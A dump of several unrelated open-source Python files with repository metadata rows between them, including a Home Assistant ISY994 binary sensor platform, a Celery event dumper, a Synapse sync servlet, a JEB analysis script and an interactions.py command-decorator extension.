#sl.log_scenario('physical path to same app, only works on file share ***')
#CallNet('file:///C:/inetpub/wwwroot/silverlighttestapp/test_net/test_net.txt', False)
#
##sl.log_info(dir(HtmlPage.DocumentUri))
##CallNet(HtmlPage.DocumentUri.get_LocalPath(), False)
#
##sl.log_scenario('url to child app on same server, works for http ***')
##CallNet('http://ironpython/networkingservice/test_net.txt')
#
##sl.log_scenario('url to different site on same server, works for http ***')
##CallNet('http://localhost/files/test_net.txt')
#
#sl.log_done()
#
| 33.461538 | 153 | 0.731954 |
4a259bba641f019255af1e4fb9d505e6759af4d5 | 1,589 | py | Python | synapse/rest/client/v1/initial_sync.py | rzr/synapse | 16026e60c5381abcfea12f55b57f8d0ce474c402 | ["Apache-2.0"] | null | null | null | synapse/rest/client/v1/initial_sync.py | rzr/synapse | 16026e60c5381abcfea12f55b57f8d0ce474c402 | ["Apache-2.0"] | null | null | null | synapse/rest/client/v1/initial_sync.py | rzr/synapse | 16026e60c5381abcfea12f55b57f8d0ce474c402 | ["Apache-2.0"] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2014, 2015 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import defer
from synapse.streams.config import PaginationConfig
from base import ClientV1RestServlet, client_path_pattern
# TODO: Needs unit testing
class InitialSyncRestServlet(ClientV1RestServlet):
PATTERN = client_path_pattern("/initialSync$")
@defer.inlineCallbacks
def on_GET(self, request):
user, client = yield self.auth.get_user_by_req(request)
with_feedback = "feedback" in request.args
as_client_event = "raw" not in request.args
pagination_config = PaginationConfig.from_request(request)
handler = self.handlers.message_handler
content = yield handler.snapshot_all_rooms(
user_id=user.to_string(),
pagin_config=pagination_config,
feedback=with_feedback,
as_client_event=as_client_event
)
defer.returnValue((200, content))
def register_servlets(hs, http_server):
InitialSyncRestServlet(hs).register(http_server)
| 35.311111 | 74 | 0.733166 |
4a259dac6d83cf604ebb4ad37fe3e80ec31395de | 18,306 | py | Python | homeassistant/components/isy994/binary_sensor.py | mikan-megane/core | 837220cce40890e296920d33a623adbc11bd15a6 | ["Apache-2.0"] | 11 | 2018-02-16T15:35:47.000Z | 2020-01-14T15:20:00.000Z | homeassistant/components/isy994/binary_sensor.py | mikan-megane/core | 837220cce40890e296920d33a623adbc11bd15a6 | ["Apache-2.0"] | 79 | 2020-07-23T07:13:37.000Z | 2022-03-22T06:02:37.000Z | homeassistant/components/isy994/binary_sensor.py | Vaarlion/core | f3de8b9f28de01abf72c0f5bb0b457eb1841f201 | ["Apache-2.0"] | 6 | 2018-02-04T03:48:55.000Z | 2022-01-24T20:37:04.000Z |
"""Support for ISY994 binary sensors."""
from __future__ import annotations
from datetime import timedelta
from pyisy.constants import (
CMD_OFF,
CMD_ON,
ISY_VALUE_UNKNOWN,
PROTO_INSTEON,
PROTO_ZWAVE,
)
from pyisy.nodes import Group, Node
from homeassistant.components.binary_sensor import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_COLD,
DEVICE_CLASS_HEAT,
DEVICE_CLASS_LIGHT,
DEVICE_CLASS_MOISTURE,
DEVICE_CLASS_MOTION,
DEVICE_CLASS_OPENING,
DEVICE_CLASS_PROBLEM,
DOMAIN as BINARY_SENSOR,
BinarySensorEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.event import async_track_point_in_utc_time
from homeassistant.util import dt as dt_util
from .const import (
_LOGGER,
BINARY_SENSOR_DEVICE_TYPES_ISY,
BINARY_SENSOR_DEVICE_TYPES_ZWAVE,
DOMAIN as ISY994_DOMAIN,
ISY994_NODES,
ISY994_PROGRAMS,
SUBNODE_CLIMATE_COOL,
SUBNODE_CLIMATE_HEAT,
SUBNODE_DUSK_DAWN,
SUBNODE_HEARTBEAT,
SUBNODE_LOW_BATTERY,
SUBNODE_MOTION_DISABLED,
SUBNODE_NEGATIVE,
SUBNODE_TAMPER,
TYPE_CATEGORY_CLIMATE,
TYPE_INSTEON_MOTION,
)
from .entity import ISYNodeEntity, ISYProgramEntity
from .helpers import migrate_old_unique_ids
DEVICE_PARENT_REQUIRED = [
DEVICE_CLASS_OPENING,
DEVICE_CLASS_MOISTURE,
DEVICE_CLASS_MOTION,
]
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> bool:
"""Set up the ISY994 binary sensor platform."""
devices = []
devices_by_address = {}
child_nodes = []
hass_isy_data = hass.data[ISY994_DOMAIN][entry.entry_id]
for node in hass_isy_data[ISY994_NODES][BINARY_SENSOR]:
device_class, device_type = _detect_device_type_and_class(node)
if node.protocol == PROTO_INSTEON:
if node.parent_node is not None:
# We'll process the Insteon child nodes last, to ensure all parent
# nodes have been processed
child_nodes.append((node, device_class, device_type))
continue
device = ISYInsteonBinarySensorEntity(node, device_class)
else:
device = ISYBinarySensorEntity(node, device_class)
devices.append(device)
devices_by_address[node.address] = device
# Handle some special child node cases for Insteon Devices
for (node, device_class, device_type) in child_nodes:
subnode_id = int(node.address.split(" ")[-1], 16)
# Handle Insteon Thermostats
if device_type.startswith(TYPE_CATEGORY_CLIMATE):
if subnode_id == SUBNODE_CLIMATE_COOL:
# Subnode 2 is the "Cool Control" sensor
# It never reports its state until first use is
# detected after an ISY Restart, so we assume it's off.
# As soon as the ISY Event Stream connects if it has a
# valid state, it will be set.
device = ISYInsteonBinarySensorEntity(node, DEVICE_CLASS_COLD, False)
devices.append(device)
elif subnode_id == SUBNODE_CLIMATE_HEAT:
# Subnode 3 is the "Heat Control" sensor
device = ISYInsteonBinarySensorEntity(node, DEVICE_CLASS_HEAT, False)
devices.append(device)
continue
if device_class in DEVICE_PARENT_REQUIRED:
parent_device = devices_by_address.get(node.parent_node.address)
if not parent_device:
_LOGGER.error(
"Node %s has a parent node %s, but no device "
"was created for the parent. Skipping",
node.address,
node.parent_node,
)
continue
if device_class in (DEVICE_CLASS_OPENING, DEVICE_CLASS_MOISTURE):
# These sensors use an optional "negative" subnode 2 to
# snag all state changes
if subnode_id == SUBNODE_NEGATIVE:
parent_device.add_negative_node(node)
elif subnode_id == SUBNODE_HEARTBEAT:
# Subnode 4 is the heartbeat node, which we will
# represent as a separate binary_sensor
device = ISYBinarySensorHeartbeat(node, parent_device)
parent_device.add_heartbeat_device(device)
devices.append(device)
continue
if (
device_class == DEVICE_CLASS_MOTION
and device_type is not None
and any(device_type.startswith(t) for t in TYPE_INSTEON_MOTION)
):
# Special cases for Insteon Motion Sensors I & II:
# Some subnodes never report status until activated, so
# the initial state is forced "OFF"/"NORMAL" if the
# parent device has a valid state. This is corrected
# upon connection to the ISY event stream if subnode has a valid state.
initial_state = None if parent_device.state is None else False
if subnode_id == SUBNODE_DUSK_DAWN:
# Subnode 2 is the Dusk/Dawn sensor
device = ISYInsteonBinarySensorEntity(node, DEVICE_CLASS_LIGHT)
devices.append(device)
continue
if subnode_id == SUBNODE_LOW_BATTERY:
# Subnode 3 is the low battery node
device = ISYInsteonBinarySensorEntity(
node, DEVICE_CLASS_BATTERY, initial_state
)
devices.append(device)
continue
if subnode_id in SUBNODE_TAMPER:
# Tamper Sub-node for MS II. Sometimes reported as "A" sometimes
# reported as "10", which translate from Hex to 10 and 16 resp.
device = ISYInsteonBinarySensorEntity(
node, DEVICE_CLASS_PROBLEM, initial_state
)
devices.append(device)
continue
if subnode_id in SUBNODE_MOTION_DISABLED:
# Motion Disabled Sub-node for MS II ("D" or "13")
device = ISYInsteonBinarySensorEntity(node)
devices.append(device)
continue
# We don't yet have any special logic for other sensor
# types, so add the nodes as individual devices
device = ISYBinarySensorEntity(node, device_class)
devices.append(device)
for name, status, _ in hass_isy_data[ISY994_PROGRAMS][BINARY_SENSOR]:
devices.append(ISYBinarySensorProgramEntity(name, status))
await migrate_old_unique_ids(hass, BINARY_SENSOR, devices)
async_add_entities(devices)
def _detect_device_type_and_class(node: Group | Node) -> tuple[str, str]:
try:
device_type = node.type
except AttributeError:
# The type attribute didn't exist in the ISY's API response
return (None, None)
# Z-Wave Devices:
if node.protocol == PROTO_ZWAVE:
device_type = f"Z{node.zwave_props.category}"
for device_class in [*BINARY_SENSOR_DEVICE_TYPES_ZWAVE]:
if (
node.zwave_props.category
in BINARY_SENSOR_DEVICE_TYPES_ZWAVE[device_class]
):
return device_class, device_type
return (None, device_type)
# Other devices (incl Insteon.)
for device_class in [*BINARY_SENSOR_DEVICE_TYPES_ISY]:
if any(
device_type.startswith(t)
for t in set(BINARY_SENSOR_DEVICE_TYPES_ISY[device_class])
):
return device_class, device_type
return (None, device_type)
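# Editor's note (illustrative): a Z-Wave node whose zwave_props.category is
# listed under BINARY_SENSOR_DEVICE_TYPES_ZWAVE[DEVICE_CLASS_MOTION] resolves
# to (DEVICE_CLASS_MOTION, "Z<category>"); nodes matching no mapping fall
# through to (None, device_type).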
class ISYBinarySensorEntity(ISYNodeEntity, BinarySensorEntity):
"""Representation of a basic ISY994 binary sensor device."""
def __init__(self, node, force_device_class=None, unknown_state=None) -> None:
"""Initialize the ISY994 binary sensor device."""
super().__init__(node)
self._device_class = force_device_class
@property
def is_on(self) -> bool:
"""Get whether the ISY994 binary sensor device is on."""
if self._node.status == ISY_VALUE_UNKNOWN:
return None
return bool(self._node.status)
@property
def device_class(self) -> str:
"""Return the class of this device.
This was discovered by parsing the device type code during init
"""
return self._device_class
class ISYInsteonBinarySensorEntity(ISYBinarySensorEntity):
"""Representation of an ISY994 Insteon binary sensor device.
Often times, a single device is represented by multiple nodes in the ISY,
allowing for different nuances in how those devices report their on and
off events. This class turns those multiple nodes into a single Home
Assistant entity and handles both ways that ISY binary sensors can work.
"""
def __init__(self, node, force_device_class=None, unknown_state=None) -> None:
"""Initialize the ISY994 binary sensor device."""
super().__init__(node, force_device_class)
self._negative_node = None
self._heartbeat_device = None
if self._node.status == ISY_VALUE_UNKNOWN:
self._computed_state = unknown_state
self._status_was_unknown = True
else:
self._computed_state = bool(self._node.status)
self._status_was_unknown = False
async def async_added_to_hass(self) -> None:
"""Subscribe to the node and subnode event emitters."""
await super().async_added_to_hass()
self._node.control_events.subscribe(self._async_positive_node_control_handler)
if self._negative_node is not None:
self._negative_node.control_events.subscribe(
self._async_negative_node_control_handler
)
def add_heartbeat_device(self, device) -> None:
"""Register a heartbeat device for this sensor.
The heartbeat node beats on its own, but we can gain a little
reliability by considering any node activity for this sensor
to be a heartbeat as well.
"""
self._heartbeat_device = device
def _async_heartbeat(self) -> None:
"""Send a heartbeat to our heartbeat device, if we have one."""
if self._heartbeat_device is not None:
self._heartbeat_device.async_heartbeat()
def add_negative_node(self, child) -> None:
"""Add a negative node to this binary sensor device.
The negative node is a node that can receive the 'off' events
for the sensor, depending on device configuration and type.
"""
self._negative_node = child
# If the negative node has a value, it means the negative node is
# in use for this device. Next we need to check to see if the
# negative and positive nodes disagree on the state (both ON or
# both OFF).
if (
self._negative_node.status != ISY_VALUE_UNKNOWN
and self._negative_node.status == self._node.status
):
# The states disagree, therefore we cannot determine the state
# of the sensor until we receive our first ON event.
self._computed_state = None
@callback
def _async_negative_node_control_handler(self, event: object) -> None:
"""Handle an "On" control event from the "negative" node."""
if event.control == CMD_ON:
_LOGGER.debug(
"Sensor %s turning Off via the Negative node sending a DON command",
self.name,
)
self._computed_state = False
self.async_write_ha_state()
self._async_heartbeat()
@callback
def _async_positive_node_control_handler(self, event: object) -> None:
"""Handle On and Off control event coming from the primary node.
Depending on device configuration, sometimes only On events
will come to this node, with the negative node representing Off
events
"""
if event.control == CMD_ON:
_LOGGER.debug(
"Sensor %s turning On via the Primary node sending a DON command",
self.name,
)
self._computed_state = True
self.async_write_ha_state()
self._async_heartbeat()
if event.control == CMD_OFF:
_LOGGER.debug(
"Sensor %s turning Off via the Primary node sending a DOF command",
self.name,
)
self._computed_state = False
self.async_write_ha_state()
self._async_heartbeat()
@callback
def async_on_update(self, event: object) -> None:
"""Primary node status updates.
We MOSTLY ignore these updates, as we listen directly to the Control
events on all nodes for this device. However, there is one edge case:
If a leak sensor is unknown, due to a recent reboot of the ISY, the
status will get updated to dry upon the first heartbeat. This status
update is the only way that a leak sensor's status changes without
an accompanying Control event, so we need to watch for it.
"""
if self._status_was_unknown and self._computed_state is None:
self._computed_state = bool(self._node.status)
self._status_was_unknown = False
self.async_write_ha_state()
self._async_heartbeat()
@property
def is_on(self) -> bool:
"""Get whether the ISY994 binary sensor device is on.
Insteon leak sensors set their primary node to On when the state is
DRY, not WET, so we invert the binary state if the user indicates
that it is a moisture sensor.
"""
if self._computed_state is None:
# Do this first so we don't invert None on moisture sensors
return None
if self.device_class == DEVICE_CLASS_MOISTURE:
return not self._computed_state
return self._computed_state
class ISYBinarySensorHeartbeat(ISYNodeEntity, BinarySensorEntity):
"""Representation of the battery state of an ISY994 sensor."""
def __init__(self, node, parent_device) -> None:
"""Initialize the ISY994 binary sensor device.
Computed state is set to UNKNOWN unless the ISY provided a valid
state. See notes above regarding ISY Sensor status on ISY restart.
If a valid state is provided (either on or off), the computed state in
HA is set to OFF (Normal). If the heartbeat is not received in 25 hours
then the computed state is set to ON (Low Battery).
"""
super().__init__(node)
self._parent_device = parent_device
self._heartbeat_timer = None
self._computed_state = None
if self.state is None:
self._computed_state = False
async def async_added_to_hass(self) -> None:
"""Subscribe to the node and subnode event emitters."""
await super().async_added_to_hass()
self._node.control_events.subscribe(self._heartbeat_node_control_handler)
# Start the timer on bootup, so we can change from UNKNOWN to OFF
self._restart_timer()
def _heartbeat_node_control_handler(self, event: object) -> None:
"""Update the heartbeat timestamp when any ON/OFF event is sent.
The ISY uses both DON and DOF commands (alternating) for a heartbeat.
"""
if event.control in [CMD_ON, CMD_OFF]:
self.async_heartbeat()
@callback
def async_heartbeat(self):
"""Mark the device as online, and restart the 25 hour timer.
This gets called when the heartbeat node beats, but also when the
parent sensor sends any events, as we can trust that to mean the device
is online. This mitigates the risk of false positives due to a single
missed heartbeat event.
"""
self._computed_state = False
self._restart_timer()
self.async_write_ha_state()
def _restart_timer(self):
"""Restart the 25 hour timer."""
try:
self._heartbeat_timer()
self._heartbeat_timer = None
except TypeError:
# No heartbeat timer is active
pass
@callback
def timer_elapsed(now) -> None:
"""Heartbeat missed; set state to ON to indicate dead battery."""
self._computed_state = True
self._heartbeat_timer = None
self.async_write_ha_state()
point_in_time = dt_util.utcnow() + timedelta(hours=25)
_LOGGER.debug(
"Heartbeat timer starting. Now: %s Then: %s",
dt_util.utcnow(),
point_in_time,
)
self._heartbeat_timer = async_track_point_in_utc_time(
self.hass, timer_elapsed, point_in_time
)
@callback
def async_on_update(self, event: object) -> None:
"""Ignore node status updates.
We listen directly to the Control events for this device.
"""
@property
def is_on(self) -> bool:
"""Get whether the ISY994 binary sensor device is on.
Note: This method will return false if the current state is UNKNOWN
which occurs after a restart until the first heartbeat or control
parent control event is received.
"""
return bool(self._computed_state)
@property
def device_class(self) -> str:
"""Get the class of this device."""
return DEVICE_CLASS_BATTERY
@property
def extra_state_attributes(self):
"""Get the state attributes for the device."""
attr = super().extra_state_attributes
attr["parent_entity_id"] = self._parent_device.entity_id
return attr
class ISYBinarySensorProgramEntity(ISYProgramEntity, BinarySensorEntity):
"""Representation of an ISY994 binary sensor program.
This does not need all of the subnode logic in the device version of binary
sensors.
"""
@property
def is_on(self) -> bool:
"""Get whether the ISY994 binary sensor device is on."""
return bool(self._node.status)
| 37.822314 | 86 | 0.644925 |
4a259dd0d1bbe036115006893111ba8f7bbff167 | 341 | py | Python | ledger/urls.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | 1 | 2018-05-01T04:54:36.000Z | 2018-05-01T04:54:36.000Z | ledger/urls.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | null | null | null | ledger/urls.py | moileretour/joatu | 9d18cb58b4280235688e269be6fd2d34b77ccead | [
"MIT"
] | 3 | 2018-04-13T18:28:32.000Z | 2018-05-01T01:38:38.000Z | from django.urls import path
from . import views
from ledger.views import ListGlobalOperationsView, ListUserOperationsView
app_name = 'ledger'
urlpatterns = [
path('operations_global/', ListGlobalOperationsView.as_view(), name='globaloperations'),
path('operations_user/', ListUserOperationsView.as_view(), name='useroperations'),
]
| 28.416667 | 92 | 0.788856 |
4a259fc9b3d803e7c68dacab166c4c9df27bc402 | 2,227 | py | Python | celery/events/dumper.py | coderanger/celery | b34074a5840086dd2a1e04e241fd9b6fabc0a570 | [
"BSD-3-Clause"
] | 1 | 2020-12-29T06:25:25.000Z | 2020-12-29T06:25:25.000Z | celery/events/dumper.py | coderanger/celery | b34074a5840086dd2a1e04e241fd9b6fabc0a570 | [
"BSD-3-Clause"
] | null | null | null | celery/events/dumper.py | coderanger/celery | b34074a5840086dd2a1e04e241fd9b6fabc0a570 | [
"BSD-3-Clause"
] | null | null | null | import sys
from datetime import datetime
from celery.app import app_or_default
from celery.datastructures import LocalCache
from celery.events import EventReceiver
TASK_NAMES = LocalCache(0xFFF)
HUMAN_TYPES = {"worker-offline": "shutdown",
"worker-online": "started",
"worker-heartbeat": "heartbeat"}
def humanize_type(type):
try:
return HUMAN_TYPES[type.lower()]
except KeyError:
return type.lower().replace("-", " ")
class Dumper(object):
def on_event(self, event):
timestamp = datetime.fromtimestamp(event.pop("timestamp"))
type = event.pop("type").lower()
hostname = event.pop("hostname")
if type.startswith("task-"):
uuid = event.pop("uuid")
if type.startswith("task-received"):
task = TASK_NAMES[uuid] = "%s(%s) args=%s kwargs=%s" % (
event.pop("name"), uuid,
event.pop("args"),
event.pop("kwargs"))
else:
task = TASK_NAMES.get(uuid, "")
return self.format_task_event(hostname, timestamp,
type, task, event)
fields = ", ".join("%s=%s" % (key, event[key])
for key in sorted(event.keys()))
sep = fields and ":" or ""
print("%s [%s] %s%s %s" % (hostname, timestamp,
humanize_type(type), sep, fields))
def format_task_event(self, hostname, timestamp, type, task, event):
fields = ", ".join("%s=%s" % (key, event[key])
for key in sorted(event.keys()))
sep = fields and ":" or ""
print("%s [%s] %s%s %s %s" % (hostname, timestamp,
humanize_type(type), sep, task, fields))
def evdump(app=None):
sys.stderr.write("-> evdump: starting capture...\n")
app = app_or_default(app)
dumper = Dumper()
conn = app.broker_connection()
recv = EventReceiver(conn, app=app, handlers={"*": dumper.on_event})
try:
recv.capture()
except (KeyboardInterrupt, SystemExit):
conn and conn.close()
if __name__ == "__main__":
evdump()
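# --- Editor's note (illustrative) ---
# evdump() resolves the default app via app_or_default(), so it can also be
# pointed at an explicit, already-configured Celery app object:
#
#     evdump(app=my_celery_app)  # `my_celery_app` is a placeholder name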
| 32.75 | 76 | 0.541536 |
4a259fcf0e33cddfec92237169378e9ef4ad5e5f | 282 | py | Python | buggy_django_app/users/apps.py | AndrewGHC/buggy_django_app | f5f0b8e58b993c60c2a98ac1874f320c0c2e4ace | [
"MIT"
] | null | null | null | buggy_django_app/users/apps.py | AndrewGHC/buggy_django_app | f5f0b8e58b993c60c2a98ac1874f320c0c2e4ace | [
"MIT"
] | null | null | null | buggy_django_app/users/apps.py | AndrewGHC/buggy_django_app | f5f0b8e58b993c60c2a98ac1874f320c0c2e4ace | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class UsersConfig(AppConfig):
name = 'buggy_django_app.users'
verbose_name = "Users"
def ready(self):
"""Override this to put in:
Users system checks
Users signal registration
"""
pass
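        # --- Editor's sketch (hypothetical wiring; not in the original) ---
        # A typical override imports a signals module so its receivers get
        # registered at startup:
        #
        #     from . import signals  # noqa: F401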
| 20.142857 | 37 | 0.606383 |
4a259ff82ff3ca5c2975fc11d7d4e841e5865c08 | 1,870 | py | Python | samples/64 Native-Contain.py | acbocai/jeb_script | 5d918a2abb7e50fbbb4c571122741d52b20959fd | [
"BSD-2-Clause"
] | 25 | 2020-10-27T11:26:02.000Z | 2022-03-31T01:40:20.000Z | samples/64 Native-Contain.py | acbocai/jeb_script | 5d918a2abb7e50fbbb4c571122741d52b20959fd | [
"BSD-2-Clause"
] | null | null | null | samples/64 Native-Contain.py | acbocai/jeb_script | 5d918a2abb7e50fbbb4c571122741d52b20959fd | [
"BSD-2-Clause"
] | 9 | 2020-12-10T20:13:23.000Z | 2022-03-04T07:09:14.000Z | # -*- coding: utf-8 -*-
from com.pnfsoftware.jeb.client.api import IClientContext
from com.pnfsoftware.jeb.core import IRuntimeProject
from com.pnfsoftware.jeb.core.units import IUnit, INativeCodeUnit
from com.pnfsoftware.jeb.core.units.code import EntryPointDescription
from com.pnfsoftware.jeb.core.units.code.asm.analyzer import INativeCodeAnalyzer, INativeCodeModel, IReferenceManager, ICallGraphManager, ICallGraph, CallGraphVertex
from com.pnfsoftware.jeb.core.units.code.asm.items import INativeMethodItem
def Test(ctx):
assert isinstance(ctx,IClientContext)
input_path = r"D:\tmp\2\project\about_dex_diff\code\xmly\libFace3D.so"
unit = ctx.open(input_path); assert isinstance(unit,IUnit)
prj = ctx.getMainProject(); assert isinstance(prj,IRuntimeProject)
    # Get the INativeCodeUnit and run its parser
    nativeCodeUnit = prj.findUnit(INativeCodeUnit); assert isinstance(nativeCodeUnit,INativeCodeUnit)
    ok = nativeCodeUnit.process()  # renamed from `bool`, which shadowed the builtin
    # Get the INativeCodeAnalyzer, then its INativeCodeModel
nativeCodeAnalyzer = nativeCodeUnit.getCodeAnalyzer(); assert isinstance(nativeCodeAnalyzer,INativeCodeAnalyzer)
nativeCodeAnalyzer.analyze()
nativeCodeModel = nativeCodeAnalyzer.getModel(); assert isinstance(nativeCodeModel,INativeCodeModel)
    # Return the start address of the routine containing this address
print "-------------------"
r = nativeCodeModel.getContainedRoutineAddresses(0x19A60)
print ">>> ",hex(r[0])
    # Return the basic block containing this address
print "-------------------"
r = nativeCodeModel.getBasicBlockHeader(0x19A60)
for insn in r.getInstructions():
print ">>> ",insn.getMnemonic()
# -------------------
# >>> 0x19a1cL
# -------------------
# >>> LDR
# >>> LDR
# >>> SUBS
# >>> ITTT
# >>> ADDEQ
# >>> POPEQ
    # >>> POPEQ
| 41.555556 | 165 | 0.659893 |
4a25a04981bce981f3a9543380bcbd3612978589 | 8,993 | py | Python | interactions/ext/enhanced/commands.py | Toricane/better-interactions | 6146945b7a1b818668a8ddca0282bd1900772205 | [
"MIT"
] | 2 | 2022-02-16T16:49:11.000Z | 2022-02-21T18:29:11.000Z | interactions/ext/enhanced/commands.py | Toricane/better-interactions | 6146945b7a1b818668a8ddca0282bd1900772205 | [
"MIT"
] | 1 | 2022-03-10T01:16:02.000Z | 2022-03-11T03:44:40.000Z | interactions/ext/enhanced/commands.py | Toricane/better-interactions | 6146945b7a1b818668a8ddca0282bd1900772205 | [
"MIT"
] | 1 | 2022-03-07T05:06:01.000Z | 2022-03-07T05:06:01.000Z | """
commands
Content:
* command: enhanced command decorator
* extension_command: enhanced extension command decorator
* autodefer: autodefer decorator
GitHub: https://github.com/interactions-py/enhanced/blob/main/interactions/ext/enhanced/commands.py
(c) 2022 interactions-py.
"""
from asyncio import Task, get_running_loop, sleep
from functools import wraps
from inspect import getdoc, signature
from logging import Logger
from typing import Any, Callable, Coroutine, Dict, List, Optional, Union
from interactions.client.decor import command as old_command
from typing_extensions import _AnnotatedAlias
from interactions import (
MISSING,
ApplicationCommandType,
Client,
CommandContext,
ComponentContext,
Guild,
Option,
)
from ._logging import get_logger
from .command_models import EnhancedOption, parameters_to_options
from .new_subcommands import Manager
log: Logger = get_logger("command")
def command(
self: Client,
_coro: Optional[Coroutine] = MISSING,
*,
type: Optional[Union[int, ApplicationCommandType]] = ApplicationCommandType.CHAT_INPUT,
name: Optional[str] = MISSING,
description: Optional[str] = MISSING,
scope: Optional[Union[int, Guild, List[int], List[Guild]]] = MISSING,
options: Optional[Union[Dict[str, Any], List[Dict[str, Any]], Option, List[Option]]] = MISSING,
default_permission: Optional[bool] = MISSING,
debug_scope: Optional[bool] = True,
) -> Callable[..., Any]:
"""
A modified decorator for creating slash commands.
Makes `name` and `description` optional, and adds ability to use `EnhancedOption`s.
Full-blown example:
```py
from interactions import OptionType, Channel
from interactions.ext.enhanced import EnhancedOption
from typing_extensions import Annotated
@bot.command()
async def options(
ctx,
option1: Annotated[str, EnhancedOption(description="...")],
option2: Annotated[OptionType.MENTIONABLE, EnhancedOption(description="...")],
option3: Annotated[Channel, EnhancedOption(description="...")],
):
\"""Says something!\"""
await ctx.send("something")
```
Parameters:
* `?type: int | ApplicationCommandType`: The type of application command. Defaults to `ApplicationCommandType.CHAT_INPUT`.
* `?name: str`: The name of the command. Defaults to function name.
* `?description: str`: The description of the command. Defaults to function docstring or `"No description"`.
* `?scope: int | Guild | list[int] | list[Guild]`: The scope of the command.
* `?options: list[Option]`: The options of the command.
* `?default_permission: bool`: The default permission of the command.
* `?debug_scope: bool`: Whether to use debug_scope for this command. Defaults to `True`.
"""
def decorator(coro: Coroutine) -> Callable[..., Any]:
_name = coro.__name__ if name is MISSING else name
_description = (
MISSING
if type != ApplicationCommandType.CHAT_INPUT
else getdoc(coro) or "No description"
if description is MISSING
else description
)
if isinstance(_description, str):
_description = _description.split("\n")[0]
if len(_description) > 100:
raise ValueError("Description must be less than 100 characters.")
_scope = (
self.__debug_scope
if scope is MISSING and hasattr(self, "__debug_scope") and debug_scope
else scope
)
params = signature(coro).parameters
_options = (
coro.__decor_options
if hasattr(coro, "__decor_options")
else parameters_to_options(params)
if options is MISSING
and len(params) > 1
and any(
isinstance(param.annotation, (EnhancedOption, _AnnotatedAlias))
for _, param in params.items()
)
else options
)
log.debug(f"command: {_name=} {_description=} {_options=}")
if not hasattr(coro, "manager"):
coro.manager = Manager(coro, _name, _description, _scope, default_permission, self)
coro.subcommand = coro.manager.subcommand
coro.group = coro.manager.group
cmd_data = old_command(
type=type,
name=_name,
description=_description,
scope=_scope,
options=_options,
default_permission=default_permission,
)
if not hasattr(self, "_command_data") or not self._command_data:
self._command_data = cmd_data
else:
self._command_data.extend(cmd_data)
if not hasattr(self, "_command_coros") or not self._command_coros:
self._command_coros = {_name: coro}
else:
self._command_coros[_name] = coro
if scope is not MISSING:
if isinstance(scope, List):
[self._scopes.add(_ if isinstance(_, int) else _.id) for _ in scope]
else:
self._scopes.add(scope if isinstance(scope, int) else scope.id)
return coro
if _coro is not MISSING:
return decorator(_coro)
return decorator
def extension_command(_coro: Optional[Coroutine] = MISSING, **kwargs):
"""
A modified decorator for creating slash commands inside `Extension`s.
Makes `name` and `description` optional, and adds ability to use `EnhancedOption`s.
Same parameters as `interactions.ext.enhanced.command`.
Parameters:
* `?type: int | ApplicationCommandType`: The type of application command. Defaults to `ApplicationCommandType.CHAT_INPUT`.
* `?name: str`: The name of the command. Defaults to function name.
* `?description: str`: The description of the command. Defaults to function docstring or `"No description"`.
* `?scope: int | Guild | list[int] | list[Guild]`: The scope of the command.
* `?options: list[Option]`: The options of the command.
* `?default_permission: bool`: The default permission of the command.
* `?debug_scope: bool`: Whether to use debug_scope for this command. Defaults to `True`.
"""
def decorator(coro):
kwargs["name"] = kwargs.get("name", coro.__name__)
kwargs["description"] = (
MISSING
if type != ApplicationCommandType.CHAT_INPUT
else kwargs.get("description", getdoc(coro) or "No description")
)
if isinstance(kwargs["description"], str):
kwargs["description"] = kwargs["description"].split("\n")[0]
if len(kwargs["description"]) > 100:
raise ValueError("Description must be less than 100 characters.")
coro.manager = Manager(
coro,
kwargs["name"],
kwargs["description"],
kwargs.get("scope"),
kwargs.get("default_permission"),
debug_scope=kwargs.get("debug_scope", True),
)
coro.subcommand = coro.manager.subcommand
coro.group = coro.manager.group
coro.__command_data__ = ((), kwargs)
log.debug(f"extension_command: {coro.__command_data__=}")
return coro
if _coro is not MISSING:
return decorator(_coro)
return decorator
def autodefer(
delay: Optional[Union[float, int]] = 2,
ephemeral: Optional[bool] = False,
edit_origin: Optional[bool] = False,
):
"""
Set up a command to be automatically deferred after some time.
Note: This will not work if blocking code is used (such as the requests module).
Usage:
```py
@bot.command(...)
@autodefer(...)
async def foo(ctx, ...):
...
```
Parameters:
* `?delay: float | int`: How long to wait before deferring in seconds. Defaults to `2`.
* `?ephemeral: bool`: If the command should be deferred hidden. Defaults to `False`.
* `?edit_origin: bool`: If the command should be deferred with the origin message. Defaults to `False`.
"""
def inner(func: Callable[..., Any]) -> Callable[..., Any]:
@wraps(func)
async def deferring_func(ctx: Union[CommandContext, ComponentContext], *args, **kwargs):
try:
loop = get_running_loop()
except RuntimeError as e:
raise RuntimeError("No running event loop detected!") from e
task: Task = loop.create_task(func(ctx, *args, **kwargs))
await sleep(delay)
if task.done():
return task.result()
if not (ctx.deferred or ctx.responded):
if isinstance(ctx, ComponentContext):
await ctx.defer(ephemeral=ephemeral, edit_origin=edit_origin)
else:
await ctx.defer(ephemeral=ephemeral)
return await task
return deferring_func
return inner
| 34.992218 | 126 | 0.628934 |
4a25a095af3783bcbe92807684f8134b2c43323d | 2,693 | py | Python | sdk/python/pulumi_azure_native/machinelearningservices/v20180301preview/list_machine_learning_compute_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/machinelearningservices/v20180301preview/list_machine_learning_compute_keys.py | sebtelko/pulumi-azure-native | 711ec021b5c73da05611c56c8a35adb0ce3244e4 | [
"Apache-2.0"
